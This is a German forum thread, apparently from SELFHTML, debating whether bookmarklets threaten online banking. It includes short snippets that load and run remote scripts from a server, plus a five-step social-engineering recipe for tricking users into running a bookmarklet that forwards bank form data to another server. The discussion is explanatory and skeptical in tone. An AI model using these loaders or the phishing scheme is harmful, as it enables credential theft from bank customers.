Rein statistisch gesehen stürzt weltweit jeden Tag ein Rechner auf Grund des Einflusses der Höhenstrahlung ab. Warum werden dann Computergehäuse nicht aus Blei gefertigt?
Ich will niemandem Computer madig machen - ich lebe ja selbst nicht schlecht davon. Nur sollte man auch nicht gerade den Kopf in den Sand stecken und sich einreden, das ganze Thema ginge sowieso nur DAUs, also andere an.
Wenn dem so wäre, würden wir nicht mit dir darüber diskutieren, sondern uns denken, dass das Thema nur DAUs beträfe.
Man kann sich ja auch überlegen, wie man seine sensiblen Operationen möglichst gut schützt. Die Idee mit den geklonten virtuellen Maschinen scheint mir nach wie vor nicht abwegig zu sein.
Wie gesagt verhindert dieses Konzept immer noch keine Infektion, d.h. wenn deine virtuelle Maschine zu Beginn einer Onlinesession attakiert wird, arbeitest du trotzdem bis zum Ausschalten auf einem kompromittierten System.
Man hat zwar beim Aufsetzen der Urmaschine ein gewisses Risiko, daß da irgendwas drin ist, dabei bleibt es dann aber auch.
Das ist ein Vorteil von Opensource-Betriebssystemen, da kannst du selbst nachschauen, ob dort kapitale Böcke sind.
Nimmt man ein Betriebssystem mit Geschichte, dann akkumulieren sich diese Risiken mit jeder Benutzung.
Wer sich solche Gedanken macht, der möchte eigentlich statt WinDOS (such dir aus, ob DOS für Dirty Operating System oder Denial of Service steht) – für das es eh genug DOSenöffner gibt – in einer virtuellen Maschine lieber ein Betriebssystem auf seinem Rechner, mit „Nur einem »remote hole« in der Standardinstallation seit über 8 Jahren!“
Viele Grüße,
Robert
Hallo Robert,
Genau hier (und an vielen weiteren Stellen) schlägt allerdings ein Problem im Zusammenhang mit Bookmarklets zu: Du hast nur etwa 500 Zeichen für deinen Code zur Verfügung. Diese experimentell mit einem Internet Explorer ermittelte Tatsache wollte ich nur noch einmal ins Gedächtnis rufen.
Das ist kein Hindernis. Wie im ersten Posting beschrieben: Ein Function-Objekt erzeugen, den Code aus dem Internet reinladen und ausführen - solche Dinger sind die Gefahr. Ohne Internetzugriff sind sie überschaubar. Sieh Dir mal den großen Suchhelfer von bookmarklet.com an; der macht genau das und als ich es sah, gingen bei mir alle roten Lampen an.
Aber falls dein kreiertes Szenario an Bedrohlichkeit zunehmen sollte, wird es dann die Möglichkeit geben, in vernünftigen Browsern Javascripten den Zugriff auf Formularfelder zu verbieten, so wie man heutzutage schon das Verändern der Statuszeile unterbinden kann.
Ich glaube, einfacher wäres es, wenn das javascript: - Protokoll im URL-Eingabefenster, in Bookmarks und evtl. in user-css für https-Seiten unterbunden würde. Dann wäre Codeinjektion m.A. nicht mehr möglich.
Gruß, Houyhnhnm
Moin!
Genau hier (und an vielen weiteren Stellen) schlägt allerdings ein Problem im Zusammenhang mit Bookmarklets zu: Du hast nur etwa 500 Zeichen für deinen Code zur Verfügung. Diese experimentell mit einem Internet Explorer ermittelte Tatsache wollte ich nur noch einmal ins Gedächtnis rufen.
Das ist kein Hindernis. Wie im ersten Posting beschrieben: Ein Function-Objekt erzeugen, den Code aus dem Internet reinladen und ausführen - solche Dinger sind die Gefahr.
Und wo ist die Klasse, von der du das Objekt erzeugst, definiert? Du musst deinen Code in 500 Zeichen unterbringen, da führt kein Weg vorbei. OK, es ist prinzipiell auch platzsparend möglich:
javascript:document.write('<script type="text/javascript" src="http://www.robertbienert.de/scripts/forms.js"></script>'); alert(pruefeLeerstring(''))
Das sind so 150 Zeichen und funktioneren auf meinem iBook allerdings nur im Firefox sowie wie dem Internet Explorer 5.2, die meisten Mac-User werden allerdings den (hiergegen immunen) Safari oder Camino benutzen.
Ohne Internetzugriff sind sie überschaubar. Sieh Dir mal den großen Suchhelfer von bookmarklet.com an; der macht genau das und als ich es sah, gingen bei mir alle roten Lampen an.
Könntest du mir bitte einen Link angeben, ich finde auf dieser Seite nichts außer Werbelinks.
Aber falls dein kreiertes Szenario an Bedrohlichkeit zunehmen sollte, wird es dann die Möglichkeit geben, in vernünftigen Browsern Javascripten den Zugriff auf Formularfelder zu verbieten, so wie man heutzutage schon das Verändern der Statuszeile unterbinden kann.
Ich glaube, einfacher wäres es, wenn das javascript: - Protokoll im URL-Eingabefenster, in Bookmarks und evtl. in user-css für https-Seiten unterbunden würde. Dann wäre Codeinjektion m.A. nicht mehr möglich.
Es gibt genug Seiten, die zwar per HTTPS übertragen werden, aber Daten (z.B. Bilder) ungeschützt anfordern und erhalten. Solche Zonenmodelle sind in der Praxis häufig Schwachstellen, wie die Vergangenheit gezeigt hat. Außerdem gibt es für Codeinjektion mit ähnlich schwerwiegenden Folgen immer noch Cross-Site-Scripting, dagegen bist du als Seitenbesucher mit aktiviertem JavaScript wirklich machtlos, weil du im Gegensatz zu einem Bookmarklet erst das Ergebnis und dann den Code siehst.
Viele Grüße,
Robert
Und wo ist die Klasse, von der du das Objekt erzeugst, definiert?
var f = document.createElement('function');
f.src = 'http://server/rechner.js';
rechner(); // das ist die Startroutine in rechner.js
Fertig ist die Laube.
Mit dem Link habe ich mich geirrt - muß später nochmal suchen, falls notwendig...
Das war natürlich Unsinn:
var f = document.createElement('function');
f.src = 'http://server/rechner.js';
rechner(); // das ist die Startroutine in rechner.js
So dürfte es eher funktionieren:
var f = document.createElement('SCRIPT');
f.type = 'text/javascript';
f.src = 'http://server/rechner.js';
rechner(); // das ist die Startroutine in rechner.js
Moin!
OK, fassen wir als zusammen: Es ist möglich, ein Bookmarklet zu erzeugen, welches Code aus einer externen Quelle nachlädt. Diese Funktion sollte, um versteckt zu bleiben im hinteren Teil des Bookmarklet-Codes notiert werden, wobei man mit etwa 100 Zeichen notwendigem Code, was den noch nutzbaren Bookmarklet-Code auf unter 400 Zeichen beschränkt, auskommen muss. Folglich scheint es so zu sein, dass man sich entscheiden muss, ob man in den Genuss von Bookmarklets kommen oder einen sicheren Browser haben möchte (Deaktivierung von Skripten auf der Client-Seite), was dann auch gegen XSS immun macht.
Falls man doch lieber von Bookmarklets profitiert, ist es unverzichtbar, sicherzugehen, dass der Code gutartig ist, was bei JavaScript durch die Eigenschaft des grundsätzlich offenen Quellcodes problemlos möglich ist; kritisch wird es bei der Verwendung des Internet Explorers, da es dort auch codierte Skripte gibt (*.vbe bzw. *.jse). Ansonsten bieten Bookmarklets den „Vorteil“ gegenüber XSS, dass man den Code vor seiner Ausführung begutachten kann, wobei man die Finger von Bookmarklets lassen sollte, die Code aus dem Internet nachladen.
Allerdings ist anzumerken, dass (im Idealfall) JavaScript in einer Sandbox lediglich innerhalb des Browsers läuft, Angriffsmöglichkeiten beschränken sich daher auf XSS-ähnliche Szenarien. Bleibt also anzumerken, dass man auch in Zukunft sicherheits-relevante Seiten wie Online-Shops oder Banken besser noscript besucht.
Viele Grüße,
Robert
Hast Du mal drüber nachgedacht, daß unter Windows jede Applikation einer anderen in die Fenster schreiben kann - einfach durch senden von Messages an das betreffende Windowhandle?
Moin!
Hast Du mal drüber nachgedacht, daß unter Windows jede Applikation einer anderen in die Fenster schreiben kann - einfach durch senden von Messages an das betreffende Windowhandle?
Nein, denn
* was hat das mit Bookmarklets im Speziellen bzw. JavaScript im Allgemeinen zu tun? Scripte laufen in einer Sandbox und kommen im Normalfall (d.h. ohne Browserbugs) nicht an Betriebssystem-Aufrufe
* Windows interessiert mich nicht, ich bin mit meinem iBook und meiner Linux-Kiste glücklich.
Viele Grüße,
Robert
* was hat das mit Bookmarklets im Speziellen bzw. JavaScript im Allgemeinen zu tun? Scripte laufen in einer Sandbox und kommen im Normalfall (d.h. ohne Browserbugs) nicht an Betriebssystem-Aufrufe
Nun, ich habe bereits meine Fanasie angeworfen - und mich entschlossen, das Ergebnis für mich zu behalten, denn es käme einer Anleitung zu massenhaftem Betrug gleich.
Nur so viel: Das mit der Sandbox ist eine Fiktion. JS kann zwar keine Systemcalls absetzen, aber das ist auch garnicht nötig. Es reicht ein kleiner Trojaner, der sich unbemerkt im System festgesetzt hat - davor ist auch Linux nicht sicher.
* Windows interessiert mich nicht, ich bin mit meinem iBook und meiner Linux-Kiste glücklich.
Das ist sehr kurzsichtig:
Moin!
* was hat das mit Bookmarklets im Speziellen bzw. JavaScript im Allgemeinen zu tun? Scripte laufen in einer Sandbox und kommen im Normalfall (d.h. ohne Browserbugs) nicht an Betriebssystem-Aufrufe
Nun, ich habe bereits meine Fanasie angeworfen - und mich entschlossen, das Ergebnis für mich zu behalten, denn es käme einer Anleitung zu massenhaftem Betrug gleich.
Falls du damit sagen willst, dass du eine entsprechende Sicherheitslücke gefunden hast – von etwas anderem kann man in diesem Zusammenhang nicht sprechen – wäre es wohl das Beste, die Browserhersteller darauf hinzuweisen. Es gibt da draußen genug schlaue Leute wie du, die ihr Wissen ebenfalls geheim halten, um es auf schädliche Art und Weise einzusetzen.
Oder bedeutet deine Aussage, dass die Diskussion über Bookmarklet-Sicherheitslücken auf BugTraq weitergeführt wird?
Nur so viel: Das mit der Sandbox ist eine Fiktion.
Bei einer vernünftigen Programmierung der Sandbox nicht.
JS kann zwar keine Systemcalls absetzen, aber das ist auch garnicht nötig. Es reicht ein kleiner Trojaner, der sich unbemerkt im System festgesetzt hat - davor ist auch Linux nicht sicher.
Und was hat nun JavaScript mit diesem Trojaner zu tun? JavaScript kann mit dem Trojaner nichts anfangen, weil es aus dem Browser nicht herauskommt und der Trojaner kann mit JavaScript nicht viel anfangen, weil er nicht an die JavaScript-API und -Interpreter des Browsers herankommt.
* Windows interessiert mich nicht, ich bin mit meinem iBook und meiner Linux-Kiste glücklich.
Das ist sehr kurzsichtig:
Wenn du meinst. In meinem aktuellen Tätigkeitsbereich taucht Windows sehr selten auf: Auf einigen Notebooks von Kommilitonen und auf ein paar Computern im PC-Pool im Fachbereich Mathematik. Die Physiker sind wenigstens vernünftig, da stehen überall Linux-Kisten herum.
Außerdem: Warum soll ich meinen Blick auch noch auf ein System richten, von dem praktisch keiner der mir näher bekannten Menschen auch nur halbwegs in der Lage ist, es zu beherrschen? Windows ist teilweise schlampig programmiert, verfügt über eine höhere Dichte an Sicherheitslücken, bringt eine Menge an unnützer Software mit, läuft nur auf einer Plattform (OK, Mac OS X auch) und hat eine inkonsistente GUI, vor allem eine inkonsistente Konfiguration. Gerade letzteres ist mir aufgefallen, seitdem ich Windows nur noch selten sehe: Mit Intuition und Logik komme ich dort nicht weit, während z.B. der Mac schnell erkundet war. Und Unix/Linux sind zwar auf Grund der Software-Vielfalt auch inkonsistent, aber es gibt trotzdem Grundregeln, mit denen man sich zurecht findet, z.B. das man-System oder die Howtos.
Ich befürchte zwar, dass Windows auch weiterhin eine Zukunft hat und dass ich mich damit ab und zu beschäftigen muss, aber solange ich weiterhin unter Unix arbeiten kann und die Windows-Arbeit gut bezahlt bekomme, will ich mich nicht beklagen.
- Mag sein, daß Du Windows doof findest. Nur: Es ist das OS mit der größten Verbreitung und Probleme, die es macht, fallen für Otto Normalverbraucher auf die Computertechnik im Allgemeinen zurück.
Ich bin von meinem Trip in die Computertechnik im Großen und Ganzen zurückgekehrt und wieder bei der Physik angekommen. Natürlich ist es heutzutage unerlässlich, dass man als Physiker auch Programmieren kann, aber mit dem Otto Normalverbraucher hat meine Arbeit nur wenig zu tun. Oder wozu braucht dieser Software zur Auswertung von Messwerten?
- Ich vermute, daß das bei Linux nicht viel anders ist, denn es benutzt in den grafischen Oberflächen ein ähnliches Nachrichtenschema.
In den grafischen Oberflächen – du hast es erkannt. Weil unter Unix bzw. Linux die GUI vom System getrennt ist und es darüber hinaus gleich mehrere GUIs gibt, wird es dein Trojaner u.U. schwierig haben. Ich benutze unter Linux z.B. weder KDE noch GNOME, sondern Blackbox und als Browser den Mozilla.
- Sicherheitsprobleme zu individualisieren, ist ungefähr so schlau, wie das Hochwasserrisiko auf den einzelnen Grundstücksbesitzer abzuwälzen.
Moment, ich individualisiere keine Sicherheitsprobleme! Ich habe lediglich gesagt, dass mich Windows nicht interessiert, ich habe keine Aussage über den einzelnen Computernutzer getroffen. Einige Sicherheitsprobleme, die mit Windows auftreten sind in der Tat Crossplatform, aber die Mehrheit der Windows-Lücken ist Windows-spezifisch wie die meisten Mac-Lücken Mac-spezifisch sind.
Viele Grüße,
Robert
Und was hat nun JavaScript mit diesem Trojaner zu tun? JavaScript kann mit dem Trojaner nichts anfangen, weil es aus dem Browser nicht herauskommt und der Trojaner kann mit JavaScript nicht viel anfangen, weil er nicht an die JavaScript-API und -Interpreter des Browsers herankommt.
Das ist der Punkt, den Du nicht durchschaust. Denk mal drüber nach...
Moin!
Und was hat nun JavaScript mit diesem Trojaner zu tun? JavaScript kann mit dem Trojaner nichts anfangen, weil es aus dem Browser nicht herauskommt und der Trojaner kann mit JavaScript nicht viel anfangen, weil er nicht an die JavaScript-API und -Interpreter des Browsers herankommt.
Das ist der Punkt, den Du nicht durchschaust. Denk mal drüber nach...
Ich habe darüber nachgedacht und bin zu dem Schluss gekommen, dass deine tolle Idee auf Browserbugs basieren muss, weil es anders ohne weiteres nicht möglich ist, einen Zusammenhang zwischen einem Bookmarklet und einem Trojaner herzustellen. Ich gehe doch wohl richtig in der Annahme, dass wir uns noch über Sicherheitsrisiken von JavaScript unterhalten? Ohne eine fehlerhafte Sandbox kommt JavaScript nicht aus dem Browser und ohne die Möglichkeit, den Code des Browsers zu manipulieren, was i.A. Super-User-Rechte erfordert, kommt der Trojaner nicht an den Browser.
Eine weitere Erklärung wäre, dass dein Trojaner das UI des Browsers manipuliert und somit den Bookmarklet-Aufruf abfängt. Ob es allerdings funktioniert, dass der Trojaner dabei unbemerkt bleibt …?
Im Übrigen scheint es mir so, dass dein anscheinend grauer Hut langsam schwarz wird.
Viele Grüße,
Robert
Heißa, Robert,
Es gibt genug Seiten, die zwar per HTTPS übertragen werden, aber Daten (z.B. Bilder) ungeschützt anfordern und erhalten.
Interessant, sowas ist mir noch nie aufgefallen. Ich habe nur mal selbst so eine Seite erstellt, und musste feststellen, dass so etwas nicht akzeptabel ist, da Internet-Explorer-Benutzer bei jedem Seitenaufruf eine Sicherheitswarnung wegklicken müssen und teilweise deren Browser abstürzt oder sich aufhängt.
Kannst du mal ein Beispiel für solch eine Seite nennen?
Gautera!
Grüße aus Biberach Riss,
Candid Dauth
Moin!
Es gibt genug Seiten, die zwar per HTTPS übertragen werden, aber Daten (z.B. Bilder) ungeschützt anfordern und erhalten.
Interessant, sowas ist mir noch nie aufgefallen. Ich habe nur mal selbst so eine Seite erstellt, und musste feststellen, dass so etwas nicht akzeptabel ist, da Internet-Explorer-Benutzer bei jedem Seitenaufruf eine Sicherheitswarnung wegklicken müssen und teilweise deren Browser abstürzt oder sich aufhängt.
Wenn du einen Mozilla benutzt, wirst du nur am Anfang darauf hingewiesen, dass die folgende(n) Seite(n) sicher übertragen wird, allerdings einige unsichere Elemente enthält.
Kannst du mal ein Beispiel für solch eine Seite nennen?
Nach dem Relaunch scheint es https://sourceforge.net/ anscheinend nicht mehr zu betreffen, aber bis vor kurzem war das dort noch so. Mittlerweile werden sogar die Skripte für die Werbung über HTTPS referenziert.
An funktionierendes Beispiel habe ich leider nicht parat.
Viele Grüße,
Robert
Heißa, Robert,
Wenn du einen Mozilla benutzt, wirst du nur am Anfang darauf hingewiesen, dass die folgende(n) Seite(n) sicher übertragen wird, allerdings einige unsichere Elemente enthält.
Soweit ich weiß, erscheint das im Mozilla sogar nur dann, wenn es sich um einen IFrame oder sonst etwas, das die Sicherheit tatsächlich beeinflusst, handelt. Gut, dass es im IE bei normalen Bildern auch kommt, ist verständlich, im IE stellt ja jedes Bild ein Sicherheitsrisiko dar…
Gautera!
Grüße aus Biberach Riss,
Candid Dauth
hi,
Was muß ein Anwender tun, um sich ein user-css einzufangen?
Das sagte ich doch bereits: In etwa das gleiche, wie bei deinem Bookmarklet-Beispiel.
Er muss von jemandem bereitgestellten Code so in sein System übernehmen, dass er dort mit den Rechten des lokalen Benutzers ausgeführt wird.
gruß,
wahsaga
Hallo.
Was muß ein Anwender tun, um sich ein user-css einzufangen?
Das sagte ich doch bereits: In etwa das gleiche, wie bei deinem Bookmarklet-Beispiel.
Er muss von jemandem bereitgestellten Code so in sein System übernehmen, dass er dort mit den Rechten des lokalen Benutzers ausgeführt wird.
Was ihm die Benutzoberfläche seines Browser jedoch im Falle eines Bookmarklets deutlich einfacher macht als beim Nutzer-CSS.
MfG, at
»» ...insofern kann ich Deine Paranoia wie auch alle anderen hier nicht nachvollziehen. Aber um Deiner Paranoia noch etwas Futter zu geben
Entgegen anderslautender Gerüchte bin ich nicht verrückt.
Ich habe lediglich durch ein abgeschlossenes Informatikstudium und fast 30 Jahre Berufserfahrung einen gewissen Überblick über das, was denkbar und möglich ist.
Das nur, um deinen Narziß etwas zu dämpfen.
Im übrigen empfehle ich Dir, einfach unter http://forum.de.selfhtml.org/?t=124997&m=805750 die Motive für diese Diskussion nachzulesen.
Moin!
»» ...insofern kann ich Deine Paranoia wie auch alle anderen hier nicht nachvollziehen. Aber um Deiner Paranoia noch etwas Futter zu geben
Entgegen anderslautender Gerüchte bin ich nicht verrückt.
Aus http://de.wikipedia.org/wiki/Paranoia:
Unter einer Paranoia (paránoia, griechisch für parà = neben, daneben und noûs = Verstand) versteht man im Allgemeinen einen Verfolgungswahn. Der Verfolgungswahn ist keine eigenständige Erkrankung, sondern lediglich ein Symptom verschiedener Erkrankungen (z. B. Neurose, Psychose, Alkoholdelir).
Damit hättest du mit deiner Aussage Recht, allerdings dürfte dir Tim keine Krankhaftigigkeit, sondern lediglich eine Art Verfolgungswahn unterstellt haben.
Ich habe lediglich durch ein abgeschlossenes Informatikstudium und fast 30 Jahre Berufserfahrung einen gewissen Überblick über das, was denkbar und möglich ist.
Das kann ich mir gut vorstellen, aber gibt es wirklich Benutzer, die so dumm sind?
So …
… sieht es besser aus.
Viele Grüße,
Robert Bienert
Das kann ich mir gut vorstellen, aber gibt es wirklich Benutzer, die so dumm sind?
Wie die tägliche Erfahrunge der Banken zeigt: Leider JA.
Die vielen Phisher, die mit immer denselben völlig verkrumpelt formulierten Traktaten offensichtlich doch immer wieder so viele 'Dumme' finden, daß sich das 'Geschäft' lohnt.
Vor einiger Zeit fand ich mal einen Test 'Erkennen Sie Phishing-Mails', oder so ähnlich, im Netz. Er enthielt wirklich nur ganz gängige Dinge. Alle richtig erkannt hatten nur ~20% der Teilnehmer.
Ich kann nur vor dem Irrglauben warnen, es träfe nur die 'Dummen'. Eine Unachtsamkeit genügt...
Moin!
Das kann ich mir gut vorstellen, aber gibt es wirklich Benutzer, die so dumm sind?
Wie die tägliche Erfahrunge der Banken zeigt: Leider JA.
Es gibt tatsächlich Leute, die sich ein Bookmarklet aufschwätzen lassen und dieses vor dem Absenden der Benutzerdaten/PIN/TAN ausführen würden? Oh Mann! Vielleicht sollte ich virtueller Brieftaschenkontrolleur werden.
Die vielen Phisher, die mit immer denselben völlig verkrumpelt formulierten Traktaten offensichtlich doch immer wieder so viele 'Dumme' finden, daß sich das 'Geschäft' lohnt.
Du meinst, das spielt sich beides auf der gleichen Ebene ab. Wenn dem so wäre, dann bewahrheitet sich doch meine Annahme, dass ein Computer – da komplexer als ein Fernseher – auch nicht so einfach und unbedacht wie ein Fernseher benutzt werden kann und damit nichts für den Massenmarkt ist.
Vor einiger Zeit fand ich mal einen Test 'Erkennen Sie Phishing-Mails', oder so ähnlich, im Netz. Er enthielt wirklich nur ganz gängige Dinge. Alle richtig erkannt hatten nur ~20% der Teilnehmer.
Ich kann dir von einem Test berichten, dass ich auch nicht alle Mails richtig erkannt habe, weil einige Banken ernstgemeinte Post an ihre Kunden verschicken, die schon sehr nach Phish richt, aber gar keinen enthält. Das war bei diesem Test, den heise damals verlinkte, nämlich das Problem: Auch echte Mails sehen wie Phishing-Mails aus.
Ich kann nur vor dem Irrglauben warnen, es träfe nur die 'Dummen'. Eine Unachtsamkeit genügt...
Klar, die Routine ist die größte Gefahr, aber bitte (zurück zur Ausgangsfrage): Welcher Experte (d.h. nicht dummer) führt vor dem Absenden seiner PIN ein (fremdes, nicht offensichtlich schädliches) Bookmarklet aus?
Viele Grüße,
Robert
Klar, die Routine ist die größte Gefahr, aber bitte (zurück zur Ausgangsfrage): Welcher Experte (d.h. nicht dummer) führt vor dem Absenden seiner PIN ein (fremdes, nicht offensichtlich schädliches) Bookmarklet aus?
Ich will nicht die Experten über die Gefahren aufklären - die sollen sich bitteschön selbst informieren - mir geht es um den ganz einfachen User, der einen Computer benutzt, wie z.B. ein Auto. Ich will solchen Leuten eine fundierte Antwort auf ihre Fragen zu JS geben können.
Fundiert heißt, daß ich weiß, was ich sage und nicht irgendwelche Statements Dritter nachzuplappern.
Da viele Augenpaare einfach mehr sehen, als ein einzelnes, stelle ich solche Dinge hier zur Diskussion, denn ich rechne damit, daß die Ausbeute an für mich neuen Aspekten des Themas hier deutlich größer ist, als wenn ich es z.B. auf dem Wochenmarkt versuche.
Was mich allerdings immer wieder verblüfft, ist, wie schnell man dabei von manchen Leuten attackiert und für verrückt (Paranoia!) erklärt wird.
Ich hasse Denkblockaden - innere und äußere.
Moin!
Was mich allerdings immer wieder verblüfft, ist, wie schnell man dabei von manchen Leuten attackiert und für verrückt (Paranoia!) erklärt wird.
Du wurdest nicht für verrückt erklärt!
Mein Einwurf "wenn schon paranoid, dann wenigstens richtig" bezieht sich lediglich darauf, dass es widersprüchlich ist, auf der einen Seite Sicherheitsbedenken bei Bookmarklets zu haben, andererseits aber Javascript insgesamt nicht zu verdammen.
Entweder sind Bookmarklets böse - dann ist Javascript insgesamt böse. Oder eben nicht. Da Bookmarklets bis zur Wirksamheit ihres versteckten bösen Innersten aber so viel Mitarbeit des Users brauchen, ist es viel wahrscheinlicher, dass genau dieses Böse durch ganz normal eingebundenes Javascript viel leichter wirksam wird.
- Sven Rautenberg
Hallo Sven,
nimms nicht tragisch - Du warst nur der Erste, der das Stichwort in die Dikussion brachte.
Generell muß ich sagen, daß dieses Argumentationsmuster dem Erkenntnisgewinn nicht förderlich ist.
Moin!
Klar, die Routine ist die größte Gefahr, aber bitte (zurück zur Ausgangsfrage): Welcher Experte (d.h. nicht dummer) führt vor dem Absenden seiner PIN ein (fremdes, nicht offensichtlich schädliches) Bookmarklet aus?
Ich will nicht die Experten über die Gefahren aufklären - die sollen sich bitteschön selbst informieren - mir geht es um den ganz einfachen User, der einen Computer benutzt, wie z.B. ein Auto.
Ähm, du weist, worauf sich meine Antwort bezog:
Ich kann nur vor dem Irrglauben warnen, es träfe nur die 'Dummen'. Eine Unachtsamkeit genügt...
Ich interpretiere das so, dass sich selbst „Experten“ von Zeit zu Zeit unnötigen Gefahren aussetzen – aus Unachtsamkeit.
Da viele Augenpaare einfach mehr sehen, als ein einzelnes, stelle ich solche Dinge hier zur Diskussion, denn ich rechne damit, daß die Ausbeute an für mich neuen Aspekten des Themas hier deutlich größer ist, als wenn ich es z.B. auf dem Wochenmarkt versuche.
Ich hoffe, dass die Ausbeute an für dich neuen Aspekten bereits jetzt schon reichhaltig ausgefallen ist.
Was mich allerdings immer wieder verblüfft, ist, wie schnell man dabei von manchen Leuten attackiert und für verrückt (Paranoia!) erklärt wird.
Wie ich bereits erklärte, will dir hier niemand eine krankhafte Paranoia oder Verrücktheit unterstellen, es bezieht sich eher auf eine Paranoia im Programmierersinne, die man z.B. durch fortgeschrittenes C-Programmieren oder den regelmäßigen Besuch einschlägiger Sicherheitsseiten erlangt. Nimm diese Auszeichnung als Lob.
Ich hasse Denkblockaden - innere und äußere.
Ich denke nicht, dass dies mit Denkblockaden zusammenhängt. Eine ganze Reihe Antworten auf deinen Beitrag zeigt IMHO, dass sich hier sehr viele intensiv mit deiner These auseinandergesetzt und darüber nachgedacht haben.
Viele Grüße,
Robert
Moin!
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Bookmarklets
Kann gar nicht sein, ich schreibe grad an einem Feature-Artikel darüber, und wenn, dann sind es keine Bugs, sondern Features des Bookmarklets ;-)
Das Prinzip ist bestechend: In einem Bookmark gibt man statt eines URLs einen JS-Ausdruck an. Klickt man das Bookmark an, dann wird der JS-Ausdruck ausgeführt.
Weil dieses Prinzip bestechend ist, wird man demnächst auf Selfhtml mehr darüber lesen können.
Man kann den Effekt direkt ausprobieren, indem man z.B. folgenden Ausdruck als URL in den Browser eingibt:
javascript:alert("test")
Man kann den Effekt außerdem direkt ausprobieren, indem man diesen Ausdruck in das href-Attribut eines http://de.selfhtml.org/html/verweise/index.htm@title=Ankers packt:
<a href="javascript:alert('test')">Klick</a> oder noch subtiler:
<a href="#" onclick="javascript:alert('test')">Klick</a>
So weit, so gut.
Jepp.
Riskant wirds aber, wenn der Ausruck z.B. ein Function-Objekt erzeugt, mit Code aus dem Internet lädt und anschließend direkt ausführt.
Zumal der Autor dieses Bookmarklets dazu nur etwa 500 Zeichen zur Verfügung hat (Internet Explorer unter Windows).
Das heruntergeladene Skript wird in den Kontext der aktuellen Seite geladen und hat Zugriff auf die zugehörigen Daten. Damit wird es möglich, über einen beliebigen Internetzugriff Daten als Parameter für ein URL an einen beliebigen Server zu senden.
Allerdings muss der Benutzer dazu das Bookmarklet explizit aufrufen. Ich fände es schon ein starkes Stück, wenn es einem Cracker durch Social-Engineering gelänge, seinem Opfer das Bookmarklet unterzuschieben, ihm zu erklären, dass das Skript das Optimum aus seiner Online-Banking hole und das Opfer dann auch tatsächlich nach dem Ausfüllen des Anmeldeformulares und vor dessen Absenden das Bookmarklet aktiviert. Wer das als Cracker schafft: Respekt. Wer das als User schafft: Respekt – BTW: ich führe grad eine Brieftaschenkontrolle durch, dürfte ich mal ihr Portmonee sehen?
Ich habe jedenfalls für mich beschlossen, daß für die wenigen Gelegenheiten, in denen ich per PIN/TAN auf meine Bankkonten zugreifen muß, eine VMware-5-Maschine mit Linux eingerichtet wird, die für Bankingsessions geklont wird, um sicher zu gehen, daß immer mit einem jungfräulichen Betriebssystem gearbeitet wird. (Das ist erfreulicherweise ein Feature von VMware Workstation 5.)
Wieviel Geld bekommst du für die VMware-Promo hier im Forum? Außerdem bist du damit immer noch nicht sicher davor, dass dir ein böser Zeitgenosse _vor_ dem Besuch deiner Online-Bank ein Bookmarklet schmackhaft macht, mit dem Hinweis, du mögest es aus *säusel* …-Gründen vor dem Absenden deiner PIN/TAN ausführen. Eine Virtualisierungslösung sorgt lediglich dafür, dass nach dem nächsten Start das Bookmarklet nicht mehr existiert, aber dann ist dein Konto eh schon leer >:->
Ansonsten: NUR HBCI MIT KLASSE-3 CHIPKARTENLESER!
Ändert das wirklich etwas an der beschriebenen Problematik? Die Welt ist schlecht!
OT: Funktionieren solche Chipkartenleser auch mit richtigen Betriebssystemen™ (Linux, BSD, Mac OS X)?
Viele Grüße,
Robert
Weil dieses Prinzip bestechend ist, wird man demnächst auf Selfhtml mehr darüber lesen können.
Super.
OT: Funktionieren solche Chipkartenleser auch mit richtigen Betriebssystemen™ (Linux, BSD, Mac OS X)?
Ja, die von einem gewissen Hersteller, dessen Namen ich aus gewissen Gründen hier nicht nennen kann.
Moin!
OT: Funktionieren solche Chipkartenleser auch mit richtigen Betriebssystemen™ (Linux, BSD, Mac OS X)?
Ja, die von einem gewissen Hersteller, dessen Namen ich aus gewissen Gründen hier nicht nennen kann.
Weil das dein Werbevertrag mit VMware nicht hergibt ;-)
Oder darf man so etwas in Deutschland nicht „offiziell“ kaufen?
Viele Grüße,
Robert
Die Firma heißt Kobil.
Es war die Antwort auf Deine Frage.
Hallo.
Ich fände es schon ein starkes Stück, wenn es einem Cracker durch Social-Engineering gelänge, seinem Opfer das Bookmarklet unterzuschieben, ihm zu erklären, dass das Skript das Optimum aus seiner Online-Banking hole und das Opfer dann auch tatsächlich nach dem Ausfüllen des Anmeldeformulares und vor dessen Absenden das Bookmarklet aktiviert.
1. Man sende eine E-Mail unter dem Namen eines Bekannten, eines bisher vertrauenswürdigen Unternehmens oder eines möglichst häufigen Namens.
2. Man verweise auf ein Bookmarklet, das die Eingaben in Formularelemente an einen anderen Server weiterleitet.
3. Man beschreibe die Technik hinter dem Bookmarklet als den ultimativen Phishing-Schutz.
4. Man leite den Nutzer dazu an, a) das Bookmarklet ordnungsgemaß abzulegen und b) es zum Zweck einer vermeintlich noch sicheren Verschlüsselung aufzurufen, wenn man gerade auf den Seiten seiner Bank die persönlichen Daten angegeben hat.
5. Man garniere die Nachricht mit Warnungen vor Phishing-Seiten und verweise auf einschlägige Artikel von Nachrichtendiensten oder Kreditinstituten.
Bemerkenswert:
Moin!
Ich fände es schon ein starkes Stück, wenn es einem Cracker durch Social-Engineering gelänge, seinem Opfer das Bookmarklet unterzuschieben, ihm zu erklären, dass das Skript das Optimum aus seiner Online-Banking hole und das Opfer dann auch tatsächlich nach dem Ausfüllen des Anmeldeformulares und vor dessen Absenden das Bookmarklet aktiviert.
- Man sende eine E-Mail unter dem Namen eines Bekannten, eines bisher vertrauenswürdigen Unternehmens oder eines möglichst häufigen Namens.
- Man verweise auf ein Bookmarklet, das die Eingaben in Formularelemente an einen anderen Server weiterleitet.
Und vergesse dabei nicht, diese Funktionalität auf gar keinen Fall zu erwähnen oder erkennbar zu machen.
- Man beschreibe die Technik hinter dem Bookmarklet als den ultimativen Phishing-Schutz.
Informiertere Zeitgenossen werden darauf wohl nicht hereinfallen, die typische Phishing-Zielgruppe leider schon.
- Man leite den Nutzer dazu an, a) das Bookmarklet ordnungsgemaß abzulegen und b) es zum Zweck einer vermeintlich noch sicheren Verschlüsselung aufzurufen, wenn man gerade auf den Seiten seiner Bank die persönlichen Daten angegeben hat.
Auch hier sollten bei informierteren Benutzern einige Alarmglocken läuten.
- Man garniere die Nachricht mit Warnungen vor Phishing-Seiten und verweise auf einschlägige Artikel von Nachrichtendiensten oder Kreditinstituten.
